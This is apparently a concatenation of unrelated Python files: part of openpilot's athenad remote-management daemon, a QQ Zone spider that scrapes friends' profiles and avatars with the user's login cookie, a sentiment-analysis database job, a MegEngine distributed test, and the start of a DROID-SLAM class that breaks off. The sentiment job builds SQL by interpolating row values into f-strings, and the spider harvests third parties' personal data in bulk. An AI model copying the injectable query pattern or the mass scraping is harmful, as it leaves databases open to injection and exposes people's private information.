upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = {item.id for item in list(upload_queue.queue)}
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
QQZoneFriendSpider.py | from src.spider.QQZoneSpider import QQZoneSpider
from urllib import parse
import json
import pandas as pd
from src.util import util
import math
import threading
import datetime
from src.util.constant import FINISH_FRIEND_INFO_ALL, STOP_FRIEND_INFO_SPIDER_KEY, WEB_SPIDER_INFO, \
FRIEND_INFO_PRE, FRIEND_INFO_COUNT_KEY, EXPIRE_TIME_IN_SECONDS, FRIEND_LIST_KEY, STOP_SPIDER_KEY, STOP_SPIDER_FLAG, \
FRIEND_NUM_KEY
from src.util.util import remove_special_tag
class QQZoneFriendSpider(QQZoneSpider):
"""
爬取自己的好友的数量、共同群组等基本信息(不是爬好友的动态)
"""
def __init__(self, use_redis=False, debug=False, analysis=True, recover=False,
username='', mood_begin=0, mood_num=-1, stop_time='-1', from_web=False, nickname='', no_delete=True, cookie_text='',
export_excel=False, export_csv = True, pool_flag='127.0.0.1',
download_small_image=False, download_big_image=False,
download_mood_detail=True, download_like_detail=True, download_like_names=True):
"""
:param use_redis: 是否使用redis
:param debug: 是否开启debug模式
:param analysis: 如果为true, 会执行爬虫程序,再执行分析程序,如果为false,只执行分析程序
"""
QQZoneSpider.__init__(self, use_redis, debug, recover=recover, username=username, mood_num=mood_num,
mood_begin=mood_begin, stop_time=stop_time, from_web=from_web, nickname=nickname,
no_delete=no_delete, cookie_text=cookie_text, pool_flag=pool_flag, download_small_image=download_small_image, download_big_image=download_big_image,
download_mood_detail=download_mood_detail, download_like_detail=download_like_detail,
download_like_names=download_like_names)
if self.g_tk == 0 and analysis == False:
self.login()
self.friend_detail = []
self.friend_list = []
self.friend_df = pd.DataFrame()
self.re = self.connect_redis()
self.friend_thread_list = []
self.export_excel = export_excel
self.export_csv = export_csv
self.error_friend_num = 0
def get_friend_list(self):
"""
获取好友列表信息
:return:
"""
friend_list_url = self.get_friend_list_url()
friend_content = self.get_json(self.req.get(url=friend_list_url, headers=self.headers, timeout=20).content.decode('utf-8'))
self.friend_list = json.loads(friend_content)['data']['items']
if self.use_redis:
self.re.set(FRIEND_LIST_KEY + self.username, json.dumps(self.friend_list, ensure_ascii=False))
if not self.no_delete:
self.re.expire(FRIEND_LIST_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
self.save_data_to_json(self.friend_list, self.FRIEND_LIST_FILE_NAME)
print('获取好友列表信息完成')
return len(self.friend_list)
def download_head_image(self):
"""
下载好友头像
不需要cookie验证
:return:
"""
if len(self.friend_list) == 0:
self.load_friend_data()
friend_num = len(self.friend_list)
thread_num = self.calculate_thread_num(friend_num)
print("下载头像的线程数量:", thread_num)
begin_time = datetime.datetime.now()
thread_list = []
for i in range(thread_num):
t = threading.Thread(target=self.do_download_image, args=(i, friend_num, thread_num))
thread_list.append(t)
for t in thread_list:
t.setDaemon(False)
t.start()
for t in thread_list:
t.join()
print('耗时:', (datetime.datetime.now() - begin_time).seconds, '秒')
print("下载全部头像完成")
def do_download_image(self, index, friend_num, step = 1):
while index < friend_num:
item = self.friend_list[index]
url = item['img']
if self.debug:
print(url)
name = item['uin']
self.download_image(url, self.FRIEND_HEADER_IMAGE_PATH + str(name))
index += step
def get_friend_detail(self):
"""
根据好友列表获取好友详情
:return:
"""
try:
friend_num = self.get_friend_list()
if self.use_redis:
self.re.set(FRIEND_NUM_KEY + self.username, friend_num)
if not self.no_delete:
self.re.expire(FRIEND_NUM_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
if self.use_redis:
self.re.rpush(WEB_SPIDER_INFO + self.username, FRIEND_INFO_PRE + ":" + str(friend_num))
if not self.no_delete:
self.re.expire(WEB_SPIDER_INFO + self.username, EXPIRE_TIME_IN_SECONDS)
self.user_info.friend_num = friend_num
thread_num = self.calculate_thread_num(friend_num)
self.logging_info("获取好友基本信息的线程数量:" + str(thread_num))
self.logging_info("开始获取好友数据...")
for i in range(thread_num):
begin_index = i
t = threading.Thread(target=self.do_get_friend_detail, args=(begin_index, friend_num, thread_num, True))
self.friend_thread_list.append(t)
for t in self.friend_thread_list:
t.setDaemon(False)
t.start()
# 等待全部子线程结束
for t in self.friend_thread_list:
t.join()
except BaseException as e:
self.format_error(e, "Faled to get friend info")
if self.use_redis:
self.re.set(STOP_FRIEND_INFO_SPIDER_KEY + self.username, FINISH_FRIEND_INFO_ALL)
self.re.set(self.FRIEND_DETAIL_FILE_NAME, json.dumps(self.friend_detail, ensure_ascii=False))
if not self.no_delete:
self.re.expire(STOP_FRIEND_INFO_SPIDER_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.FRIEND_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
else:
self.save_data_to_json(self.friend_detail, self.FRIEND_DETAIL_FILE_NAME)
print("获取好友数据成功,文件路径为:", self.FRIEND_DETAIL_FILE_NAME)
# 保证每个线程至少爬20次,最多开self.thread_num个线程
def calculate_thread_num(self, num):
if num >= 20 * self.thread_num:
thread_num = self.thread_num
else:
thread_num = math.ceil(num / 20)
return thread_num
def do_get_friend_detail(self, index, friend_num, step=1, until_stop_time=True):
# 避免好友数量为0
if step < 1:
step = 1
while index < friend_num and until_stop_time:
friend = self.friend_list[index]
uin = friend['uin']
if self.debug:
print('正在爬取好友:', uin, '数据...,', 'index=', index)
url = self.get_friend_detail_url(uin)
content = self.get_json(self.req.get(url, headers=self.headers, timeout=20).content.decode('utf-8'))
data = json.loads(content)
try:
data = data['data']
data['friendUin'] = uin
except BaseException as e:
self.format_error(e, friend)
if self.debug:
print(data)
self.error_friend_num += 1
continue
finally:
index += step
self.friend_detail.append(data)
if self.use_redis:
# 这里保存的是friend detail的长度,在多线程的情况下,只有friend detail才能表示所有的数据
self.re.set(FRIEND_INFO_COUNT_KEY + self.username, len(self.friend_detail) + self.error_friend_num)
if not self.no_delete:
self.re.expire(FRIEND_INFO_COUNT_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
until_stop_time = False if self.re.get(STOP_SPIDER_KEY + str(self.username)) == STOP_SPIDER_FLAG else True
def get_friend_list_url(self):
friend_url = 'https://user.qzone.qq.com/proxy/domain/r.qzone.qq.com/cgi-bin/tfriend/friend_show_qqfriends.cgi?'
params = {
'uin': self.username,
'follow_flag': 0,
'groupface_flag': 0,
'fupdate': 1,
'g_tk': self.g_tk,
'qzonetoken': ''
}
friend_url = friend_url + parse.urlencode(params)
return friend_url
def get_friend_detail_url(self, uin):
detail_url = 'https://user.qzone.qq.com/proxy/domain/r.qzone.qq.com/cgi-bin/friendship/cgi_friendship?'
params = {
'activeuin': self.username,
'passiveuin': uin,
'situation': 1,
'isCalendar': 1,
'g_tk': self.g_tk
}
return detail_url + parse.urlencode(params)
def load_friend_data(self):
try:
if self.use_redis:
self.friend_detail = self.re.get(self.FRIEND_DETAIL_FILE_NAME)
self.friend_list = self.re.get(self.FRIEND_LIST_FILE_NAME)
if self.friend_detail is None or self.friend_list is None:
raise BaseException
else:
raise BaseException
except BaseException as e:
if self.use_redis:
self.format_error(e, "Failed to load data from redis")
print("try to load data from json now")
try:
self.friend_detail = self.load_data_from_json(self.FRIEND_DETAIL_FILE_NAME)
self.friend_list = self.load_data_from_json(self.FRIEND_LIST_FILE_NAME)
if self.friend_detail is None or self.friend_list is None:
raise FileNotFoundError
print("Success to load data from json")
except FileNotFoundError as e:
self.format_error(e, "Failed to load data from json...")
print("now, try to start spider to get friend info...")
self.friend_list = []
self.friend_detail = []
self.login()
self.get_friend_detail()
def clean_friend_data(self):
"""
清洗好友数据,生成csv
:return:
"""
try:
if len(self.friend_list) == 0:
self.load_friend_data()
friend_total_num = len(self.friend_list)
print("valid friend num:", friend_total_num)
friend_list_df = pd.DataFrame(self.friend_list)
self.friend_detail_list = []
if friend_total_num == 0:
print("该用户没有好友")
return False
for friend in self.friend_detail:
try:
friend_uin = friend['friendUin']
add_friend_time = friend['addFriendTime']
img = friend_list_df.loc[friend_list_df['uin'] == friend_uin, 'img'].values[0]
nick = friend['nick']
nick_name = remove_special_tag(nick[str(friend_uin)])
common_friend_num = len(friend['common']['friend'])
common_group_num = len(friend['common']['group'])
common_group_names = friend['common']['group']
self.friend_detail_list.append(
dict(uin=self.username, friend_uin=friend_uin, add_friend_time=add_friend_time,
nick_name=nick_name, common_friend_num=common_friend_num,
common_group_num=common_group_num, common_group_names=common_group_names, img=img))
except BaseException as e:
if self.debug:
print("单向好友:", friend)
self.friend_detail_list.append(
dict(uin=0, friend_uin=friend['friendUin'], add_friend_time=0,
nick_name='单向好友', common_friend_num=0,
common_group_num=0, common_group_names='', img=''))
friend_df = pd.DataFrame(self.friend_detail_list)
friend_df.sort_values(by='add_friend_time', inplace=True)
friend_df['add_friend_time2'] = friend_df['add_friend_time'].apply(lambda x: util.get_full_time_from_mktime(x))
friend_df.fillna('', inplace=True)
if self.export_excel:
friend_df.to_excel(self.FRIEND_DETAIL_EXCEL_FILE_NAME)
if self.export_csv:
friend_df.to_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
if self.debug:
print("Finish to clean friend data...")
print("File Name:", self.FRIEND_DETAIL_LIST_FILE_NAME)
self.friend_df = friend_df
return True
except BaseException as e:
self.format_error(e, "Failed to parse friend_info")
return False
def get_friend_total_num(self):
self.load_friend_data()
friend_total_num = len(self.friend_list)
return friend_total_num
def calculate_friend_num_timeline(self, timestamp, friend_df):
"""
:param timestamp: 传入时间戳
:return: 用户在给定时间点的好友数量
"""
friend_total_num = friend_df.shape[0]
friend_df_time = friend_df[friend_df['add_friend_time'] > timestamp]
friend_time_num = friend_total_num - friend_df_time.shape[0]
if self.debug:
print(util.get_standard_time_from_mktime(timestamp), friend_time_num)
return friend_time_num
def get_friend_result_file_name(self):
return self.FRIEND_DETAIL_LIST_FILE_NAME
def get_most_common_friend(self):
if self.friend_df.empty:
try:
self.friend_df = pd.read_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
except FileNotFoundError:
self.clean_friend_data()
max_index = self.friend_df['common_friend_num'].max()
most_friend = self.friend_df.loc[self.friend_df['common_friend_num'] == max_index, ['common_friend_num', 'nick_name']].values[0]
self.user_info.most_common_friend_num = most_friend[0]
self.user_info.most_friend = most_friend[1]
def get_most_group(self):
if self.friend_df.empty:
try:
self.friend_df = pd.read_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
except FileNotFoundError:
self.clean_friend_data()
self.friend_df.fillna('', inplace=True)
common_group_names = self.friend_df['common_group_names']
common_group_names_list = []
for item in common_group_names:
if item != '':
try:
if type(item) != list:
item = json.loads(item.replace('\'', '\"'))
common_group_names_list.extend(item)
except:
pass
if len(common_group_names_list) > 0:
df = pd.DataFrame(common_group_names_list)
df['count'] = 1
result = df.groupby(by='name').agg({'count': sum}).reset_index()
most_group = result.loc[result['count'] == result['count'].max(), :].values[0]
self.user_info.most_group = most_group[0]
self.user_info.most_group_member = most_group[1]
print(most_group)
def get_first_friend_info(self):
if self.friend_df.empty:
try:
self.friend_df = pd.read_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
except FileNotFoundError:
self.clean_friend_data()
self.get_single_friend()
# self.user_info.friend_num = self.friend_df.shape[0]
zero_index = self.friend_df[self.friend_df['add_friend_time'] == 0].index
self.friend_df.drop(index=zero_index, axis=0, inplace=True)
self.friend_df.reset_index(inplace=True)
early_time = util.get_standard_time_from_mktime(self.friend_df.loc[0,'add_friend_time'])
early_nick = self.friend_df.loc[0, 'nick_name']
first_header_url = self.FRIEND_HEADER_IMAGE_PATH + str(int(self.friend_df.loc[0, 'friend_uin'])) + '.jpg'
self.user_info.first_friend = early_nick
self.user_info.first_friend_time = early_time
self.user_info.first_friend_header = first_header_url
self.user_info.save_user()
def get_single_friend(self):
single_friend = self.friend_df[self.friend_df['uin'] == 0].shape[0]
self.user_info.single_friend = single_friend
if __name__ == '__main__':
friend_spider = QQZoneFriendSpider(use_redis=True, debug=True, analysis=False)
friend_spider.get_friend_detail()
friend_spider.download_head_image()
friend_spider.clean_friend_data()
friend_spider.get_first_friend_info()
# friend_spider.calculate_friend_num_timeline(1411891250)
|
sentiment_analysis.py | """Generate account statements.
This module will create statement records for each account.
"""
import os
import threading
import psycopg2
from transformers import pipeline
from api.services.transformers import overall_sentiment_transformers
from flask import Flask
import config
from utils.logger import setup_logging, log_info
from dbms import client, Databse
setup_logging(
os.path.join(os.path.abspath(os.path.dirname(__file__)), "logging.conf")
) # important to do this first
APP_CONFIG = config.get_named_config(os.getenv("DEPLOYMENT_ENV", "production"))
class LoadModel: # pylint: disable=too-few-public-methods
"""Manages the model."""
classifier = None
model_id = APP_CONFIG.MODEL_ID
@classmethod
def preload_models(cls):
"""Function to load the fine-tuned transformer model."""
cls.classifier = pipeline(
"sentiment-analysis", model=cls.model_id, truncation=True
)
return 0
# pylint:disable=no-member
def create_app(run_mode=os.getenv("FLASK_ENV", "production")):
"""Return a configured Flask App using the Factory method."""
app = Flask(__name__)
app.config.from_object(config.CONFIGURATION[run_mode])
app.logger.info("<<<< Starting Sentiment analysis job >>>>")
register_shellcontext(app)
preloading = threading.Thread(target=LoadModel.preload_models)
log_info("Model is loading...")
if LoadModel.model_id is None:
raise RuntimeError("Model id cannot be empty")
preloading.start()
log_info(f"Model id: {LoadModel.model_id}")
preloading.join()
log_info("Model loading complete.")
app.classifier = LoadModel.classifier
return app
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {"app": app} # pragma: no cover
app.shell_context_processor(shell_context)
def update_sentiment():
"""Update sentiment by querying the records."""
conn = None
try:
log_info("Starting sentiment analysis.")
# connect to the PostgreSQL server
conn = client.connect(Databse[APP_CONFIG.DBMS].value, APP_CONFIG)
table_name = APP_CONFIG.DATABASE_TABLE_NAME
input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
# Find primary key for the table.
primary_keys = _find_primary_keys(conn, table_name)
log_info(f"found primary keys : {primary_keys}")
# Query the rows from table.
rows_query = client.get_row_query(
Databse[APP_CONFIG.DBMS].value,
primary_keys,
input_col,
table_name,
output_col,
limit=100,
app_config=APP_CONFIG,
)
log_info("Query executed")
try:
cur = conn.cursor()
cur.execute(rows_query)
colnames = [desc[0] for desc in cur.description]
results = cur.fetchall()
finally:
cur.close()
_perform_analysis(colnames, conn, results)
# commit the changes
conn.commit()
except (Exception, psycopg2.DatabaseError) as error: # noqa
raise error
finally:
if conn is not None:
conn.close()
def _find_primary_keys(conn, table_name):
"""Fetch the primary keys of rows that match the pf_query."""
# Generalized query to support different databases.
pk_query = (
f"SELECT column_name FROM information_schema.table_constraints AS tc "
f"JOIN information_schema.key_column_usage AS kc ON tc.CONSTRAINT_CATALOG = "
f"kc.CONSTRAINT_CATALOG AND tc.CONSTRAINT_SCHEMA = "
f"kc.CONSTRAINT_SCHEMA AND tc.CONSTRAINT_NAME "
f" = kc.CONSTRAINT_NAME AND tc.TABLE_CATALOG = kc.TABLE_CATALOG AND tc.TABLE_SCHEMA "
f"= kc.TABLE_SCHEMA AND tc.TABLE_NAME = kc.TABLE_NAME "
f"WHERE constraint_type = 'PRIMARY KEY' AND (tc.table_name) = "
f"('{table_name}') ORDER BY ordinal_position;"
)
try:
cur = conn.cursor()
cur.execute(pk_query)
primary_keys = ",".join(cur.fetchall()[0])
finally:
cur.close()
return primary_keys
def _perform_analysis(colnames, conn, results):
# Create a list of dicts with column name and results.
table_name = APP_CONFIG.DATABASE_TABLE_NAME
input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
if APP_CONFIG.SCHEMA_NAME:
table_name = f"{APP_CONFIG.SCHEMA_NAME}.{table_name}"
query_results = [dict(zip(colnames, result)) for result in results]
count: int = 0
for result_dict in query_results:
log_info(f"Finding sentiment for for {result_dict}")
sentiment = overall_sentiment_transformers(result_dict.get(input_col))
log_info(f"Sentiment {sentiment}")
update_qry = f"update {table_name} set {output_col}='{sentiment}' where 1=1 "
for key, value in result_dict.items():
if key != input_col:
update_qry += f" AND {key}='{value}' "
try:
cur = conn.cursor()
cur.execute(update_qry)
finally:
cur.close()
count += 1
print(f"Updated {count} records")
def run():
"""Run the job."""
application = create_app()
application.app_context().push()
update_sentiment()
if __name__ == "__main__":
run()
|
test_distributed.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import subprocess
import sys
import numpy as np
import pytest
def worker(master_ip, master_port, world_size, rank, dev, trace):
import megengine.distributed as dist
import megengine.functional as F
from megengine import is_cuda_available
from megengine import jit
from megengine.module import Linear, Module
from megengine.optimizer import SGD
if not is_cuda_available():
return
class MLP(Module):
def __init__(self):
super().__init__()
self.fc0 = Linear(3 * 224 * 224, 500)
self.fc1 = Linear(500, 10)
def forward(self, x):
x = self.fc0(x)
x = F.relu(x)
x = self.fc1(x)
return x
dist.init_process_group(
master_ip=master_ip, master_port=3456, world_size=world_size, rank=rank, dev=dev
)
net = MLP()
opt = SGD(net.parameters(requires_grad=True), lr=0.02)
data = np.random.random((64, 3 * 224 * 224)).astype(np.float32)
label = np.random.randint(0, 10, size=(64,)).astype(np.int32)
jit.trace.enabled = trace
@jit.trace()
def train_func(data, label):
pred = net(data)
loss = F.cross_entropy_with_softmax(pred, label)
opt.backward(loss)
return loss
for i in range(5):
opt.zero_grad()
loss = train_func(data, label)
opt.step()
def start_workers(worker, world_size, trace=False):
def run_subproc(rank):
cmd = "from test.integration.test_distributed import worker\n"
cmd += "worker('localhost', 3456, {}, {}, {}, {})".format(
world_size, rank, rank, "True" if trace else "False"
)
cmd = [sys.executable, "-c", cmd]
ret = subprocess.run(
cmd, stdout=sys.stdout, stderr=sys.stderr, universal_newlines=True
)
assert ret.returncode == 0, "subprocess failed"
procs = []
for rank in range(world_size):
p = mp.Process(target=run_subproc, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join()
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
def test_distributed():
start_workers(worker, 2, trace=True)
start_workers(worker, 2, trace=False)
|
droid.py | import torch
import lietorch
import numpy as np
from droid_net import DroidNet
from depth_video import DepthVideo
from motion_filter import MotionFilter
from droid_frontend import DroidFrontend
from droid_backend import DroidBackend
from trajectory_filler import PoseTrajectoryFiller
from collections import OrderedDict
from torch.multiprocessing import Process
class Droid:
def __init__(self, args):
super(Droid, self).__init__()
self.load_weights(args.weights)
self.args = args
self.disable_vis = args.disable_vis
# store images, depth, poses, intrinsics (shared between processes)
self.video = DepthVideo(args.image_size, args.buffer, stereo=args.stereo)
# filter incoming frames so that there is enough motion
self.filterx = MotionFilter(self.net, self.video, thresh=args.filter_thresh)
# frontend process
self.frontend = DroidFrontend(self.net, self.video, self.args)
# backend process
self.backend = DroidBackend(self.net, self.video, self.args)
# visualizer
if not self.disable_vis:
from visualization import droid_visualization
self.visualizer = Process(target=droid_visualization, args=(self.video,))
self.visualizer.start()
# post processor - fill in poses for non-keyframes
self.traj_filler = PoseTrajectoryFiller(self.net, self.video)
def load_weights(self, weights):
""" load trained model weights """
